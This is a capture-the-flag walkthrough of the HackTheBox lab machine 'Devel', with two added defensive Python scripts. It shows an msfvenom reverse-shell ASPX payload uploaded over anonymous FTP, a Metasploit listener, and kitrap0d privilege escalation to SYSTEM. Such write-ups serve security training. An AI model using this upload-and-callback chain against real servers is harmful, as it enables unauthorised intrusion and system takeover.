DEVEL

Enumeration:

First we start by enumerating the machine to see what is waiting for us!

root@kali:~# nmap -sV -sC 10.10.10.5

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-25 00:53 UTC
Nmap scan report for 10.10.10.5
Host is up (0.016s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Here we can see that an FTP server (Microsoft ftpd) on port 21 and a Microsoft IIS 7.5 web server on port 80 are both open. We also notice that the FTP server allows anonymous login, so let's see what we can do there...

root@kali:~# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp>

The FTP listing (aspnet_client, iisstart.htm, welcome.png) is the default IIS webroot, so we can upload a file to the server and then browse to it over HTTP. Our goal here is to get access to the box via a reverse shell back to our machine, so let's prepare our payload and upload it to the FTP server.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=4444 -f aspx > shell.aspx
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of aspx file: 2797 bytes

As you can see from the above command, we used msfvenom to create our payload: a Windows payload, because that is the OS of the machine we are targeting; LHOST set to the attacking machine and LPORT to the port we will listen on; and ASPX output format so that IIS will execute the file when it is requested. Now we need to prepare our listener and upload the payload to the server via FTP.

root@kali:~/Desktop# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
2833 bytes sent in 0.00 secs (10.7213 MB/s)
ftp>

We successfully uploaded our payload, "shell.aspx". Now we need to start our listener before we browse to it. For the listener we can use Netcat or Metasploit; for this box we are going to use Metasploit.

Exploitation:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.10.x.x
LHOST => 10.10.x.x
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.10.x.x:4444

The listener is now ready, configured with the same payload and waiting for a connection on port 4444. If we now browse to the payload at http://10.10.10.5/shell.aspx we should get a Meterpreter session back.

msf exploit(handler) >
[*] Sending stage (179267 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.x.x:4444 -> 10.10.10.5:49158) at 2017-12-25 01:06:06 +0000

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > pwd
c:\windows\system32\inetsrv

meterpreter > shell
Process 1776 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\users

18/03/2017  01:16 ��    <DIR>          .
18/03/2017  01:16 ��    <DIR>          ..
18/03/2017  01:16 ��    <DIR>          Administrator
17/03/2017  04:17 ��    <DIR>          babis
18/03/2017  01:06 ��    <DIR>          Classic .NET AppPool
14/07/2009  09:20 ��    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  23.711.891.456 bytes free

c:\users>cd babis
cd babis
Access is denied.

c:\users>cd administrator
cd administrator
Access is denied.

Opaaa, and we have Meterpreter session 1 opened... but we can't access the babis or Administrator home directories, which means we need to escalate our privileges. But first, let's gather some information about the machine that will help us in the privilege escalation process.
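Before moving on to privilege escalation, the upload-and-browse sequence above is worth looking at from the defender's side. The following Python script is an added example, not part of the original write-up: it parses IIS W3C-format FTP and web logs and raises an alert when a script file (.asp, .aspx, .ashx, .asmx) is written over FTP and then requested over HTTP shortly afterwards, and it separately lists every file written by the anonymous FTP user. The field order of the two logs is the IIS 7.5 default as I know it, the log lines and the client address 10.10.14.2 are constructed for the example, and the correlation assumes, as on this host, that the FTP root and the IIS webroot are the same directory.

```python
# Added example (not from the original write-up): correlate IIS FTP uploads with
# IIS web requests to spot a script file dropped into the webroot and then executed.
# Log layouts are W3C extended format with the IIS 7.5 default field order (assumed);
# the sample lines and the client address 10.10.14.2 are constructed, not captured.
from datetime import datetime

# Extensions IIS hands to a script engine when they are requested over HTTP.
SCRIPT_EXTENSIONS = (".asp", ".aspx", ".ashx", ".asmx")

# Constructed sample of an IIS FTP site log.
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2017-12-25 01:04:40 10.10.14.2 - 10.10.10.5 21 USER anonymous 331 0 0 2a1c9f -
2017-12-25 01:04:41 10.10.14.2 anonymous 10.10.10.5 21 PASS *** 230 0 0 2a1c9f /
2017-12-25 01:04:50 10.10.14.2 anonymous 10.10.10.5 21 STOR shell.aspx 226 0 0 2a1c9f /shell.aspx
2017-12-25 01:05:02 10.10.14.9 anonymous 10.10.10.5 21 STOR notes.txt 226 0 0 7b3e11 /notes.txt
"""

# Constructed sample of the IIS web site log for the same host.
WEB_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2017-12-25 01:05:30 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 15
2017-12-25 01:06:05 10.10.10.5 GET /shell.aspx - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 1203
2017-12-25 01:06:09 10.10.10.5 GET /notes.txt - 80 - 10.10.14.9 Mozilla/5.0 200 0 0 3
"""

WRITE_COMMANDS = ("STOR", "STOU", "APPE")


def parse_w3c(text):
    """Parse a W3C extended log into one dict per record, using the '#Fields:' header."""
    fields, records = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Version, #Date)
        values = line.split()  # IIS encodes spaces inside values as '+', so split is safe
        if len(values) == len(fields):
            records.append(dict(zip(fields, values)))
    return records


def _when(rec):
    return datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")


def _basename(path):
    return path.rsplit("/", 1)[-1].lower()


def anonymous_writes(ftp_log):
    """Files written by the anonymous FTP user: any hit means the site grants anonymous write."""
    return [
        _basename(r["cs-uri-stem"])
        for r in parse_w3c(ftp_log)
        if r["cs-method"] in WRITE_COMMANDS and r["cs-username"].lower() == "anonymous"
    ]


def uploaded_then_executed(ftp_log, web_log, window_seconds=3600):
    """Script files uploaded over FTP and then requested over HTTP within the window.

    Assumes the FTP root and the web root are the same directory (as on this host),
    so the uploaded name can be matched by basename against the request path.
    """
    uploads = [
        r for r in parse_w3c(ftp_log)
        if r["cs-method"] in WRITE_COMMANDS
        and _basename(r["cs-uri-stem"]).endswith(SCRIPT_EXTENSIONS)
    ]
    requests = [r for r in parse_w3c(web_log) if r["cs-method"] == "GET"]
    alerts = []
    for up in uploads:
        name, t_up = _basename(up["cs-uri-stem"]), _when(up)
        for req in requests:
            if _basename(req["cs-uri-stem"]) != name:
                continue
            delta = (_when(req) - t_up).total_seconds()
            if 0 <= delta <= window_seconds:
                alerts.append({
                    "file": name,
                    "uploaded_by": up["cs-username"],
                    "upload_ip": up["c-ip"],
                    "uploaded_at": up["date"] + " " + up["time"],
                    "requested_from": req["c-ip"],
                    "requested_at": req["date"] + " " + req["time"],
                    "http_status": req["sc-status"],
                })
    return alerts


if __name__ == "__main__":
    for alert in uploaded_then_executed(FTP_LOG, WEB_LOG):
        print("ALERT script uploaded and then executed:", alert)
    print("files written by anonymous:", anonymous_writes(FTP_LOG))
```

Either finding is actionable on its own: a successful anonymous STOR means the FTP authorization rule grants anonymous users Write, which should be cut back to Read (or anonymous authentication disabled altogether), and a script extension appearing in an FTP upload to the webroot is worth alerting on even when no HTTP request follows it.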

c:\users>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                00392-918-5000002-85765
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          24/12/2017, 10:39:35 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 63 Stepping 2 GenuineIntel ~2594 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.024 MB
Available Physical Memory: 739 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.544 MB
Virtual Memory: In Use:    504 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5

We can see from "Hotfix(s): N/A" that the machine has never been updated, so let's check for possible attacks using the Metasploit local exploit suggester (use post/multi/recon/local_exploit_suggester). This module checks the session against multiple local exploits, any of which could give us the SYSTEM account.
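To turn the "has it ever been patched" question into something you can check mechanically rather than by eye, here is an added Python example (not from the original write-up) that parses systeminfo output into a dictionary, keeping multi-line values such as the processor and hotfix lists intact, and reports findings from it: no hotfixes installed, and a 6.1 build number below 7601, which is the Windows 7 SP1 build. The first sample is a trimmed copy of the systeminfo output above with the locale-garbled timestamps left out; the second, patched-looking sample is constructed and its KB numbers are placeholders.

```python
# Added example (not from the original write-up): parse systeminfo output and
# flag an unpatched Windows 7 build. SYSTEMINFO is a trimmed copy of the output
# shown above; PATCHED_SAMPLE is constructed and its KB numbers are placeholders.
import re

SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
Registered Owner:          babis
Registered Organization:
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 63 Stepping 2 GenuineIntel ~2594 Mhz
Virtual Memory: Max Size:  2.048 MB
Domain:                    HTB
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 IP address(es)
                                 [01]: 10.10.10.5
"""

PATCHED_SAMPLE = """\
Host Name:                 EXAMPLE
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB1111111
                           [02]: KB2222222
"""

# Kernel version -> build number of the first service pack (6.1 = Windows 7 / 2008 R2).
SP1_BUILD = {"6.1": 7601}

# A key line is "Key:" followed by two or more spaces (or nothing); this keeps
# keys that themselves contain a colon, such as "Virtual Memory: Max Size", whole.
_KEY_LINE = re.compile(r"^(.+?):(?:\s{2,}|\s*$)(.*)$")


def parse_systeminfo(text):
    """Return {key: [value, continuation lines...]}; indented lines extend the previous key."""
    info, key = {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if line[0].isspace():
            if key is not None:
                info[key].append(line.strip())
            continue
        m = _KEY_LINE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        info[key] = [value] if value else []
    return info


def installed_hotfixes(info):
    """KB identifiers listed under Hotfix(s); empty when the value is 'N/A'."""
    return [v.split(":", 1)[1].strip() for v in info.get("Hotfix(s)", []) if v.startswith("[")]


def assess(info):
    """Patch-level findings a defender would want to raise from this output."""
    findings = []
    if not installed_hotfixes(info):
        findings.append("no hotfixes installed: every public fix since the install media is missing")
    version = " ".join(info.get("OS Version", []))
    m = re.match(r"(\d+\.\d+)\.(\d+)", version)
    if m:
        kernel, build = m.group(1), int(m.group(2))
        if kernel in SP1_BUILD and build < SP1_BUILD[kernel]:
            findings.append(f"build {build} is pre-Service Pack 1 (SP1 is build {SP1_BUILD[kernel]})")
    if info.get("OS Configuration") == ["Standalone Workstation"]:
        findings.append("standalone workstation: not under a domain update policy, verify how it receives updates")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_systeminfo(SYSTEMINFO)):
        print("FINDING:", finding)
```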

msf post(local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > set SESSION 1
SESSION => 1
msf post(local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 37 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

Here we can see that the machine is vulnerable to several different attacks, because this Windows 7 install has never been updated since its 2009 release build. So basically any of the above exploits should give us SYSTEM access; we go with ms10_015_kitrap0d.

msf exploit(ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf exploit(ms10_015_kitrap0d) > set LPORT 4444
LPORT => 4444
msf exploit(ms10_015_kitrap0d) > exploit

[*] Started reverse TCP handler on 10.10.x.x:4444
[*] Launching notepad to host the exploit...
[+] Process 452 launched.
[*] Reflectively injecting the exploit DLL into 452...
[*] Injecting exploit into 452 ...
[*] Exploit injected. Injecting payload into 452...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179267 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.x.x:4444 -> 10.10.10.5:49158) at 2017-12-25 01:23:36 +0000

meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > shell
Process 1004 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>cd  c:/users/administrator
cd  c:/users/administrator

c:\Users\Administrator>
c:\Users\Administrator\Desktop>dir          
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\Administrator\Desktop

18/03/2017  01:17 ��    <DIR>          .
18/03/2017  01:17 ��    <DIR>          ..
18/03/2017  01:17 ��                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  23.539.904.512 bytes free

c:\Users\Administrator\Desktop>type root.txt.txt

Here we go, we got SYSTEM privileges and now we can grab the root and user flags. Happy hacking :D

© 2018 by Joul Kouchakji
